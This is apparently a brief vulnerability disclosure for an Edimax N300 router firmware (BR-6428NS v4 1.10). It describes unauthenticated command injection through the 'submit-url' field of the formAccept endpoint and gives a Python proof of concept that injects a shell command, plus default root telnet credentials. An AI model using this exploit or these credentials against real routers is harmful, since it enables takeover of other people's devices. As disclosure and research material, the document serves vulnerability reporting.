Command Injection
Command injection without any limitations
Firmware
Wireless: Edimax home Wireless Routers N300
Firmware Version: BR-6428NS_v4_1.10
You can download Firmware at this website and use FirmAE to simulate the router environment.
FirmAE command: ./run.sh -r v4 BR-6428NS_v4_1.10.bin(This will take a while, please be patient:)
Description
The vulnerability was found in /bin/webs.
Function is formAccept
poc
python
import requests
command = "touch /tmp/Swe3ty3"
url = "http://192.168.2.1/goform/formAccept"
data = {
"submit-url":command
}
r = requests.post(url,data=data)
print(r.text)use root/edimaxens telnet to the router
telnet 192.168.2.1

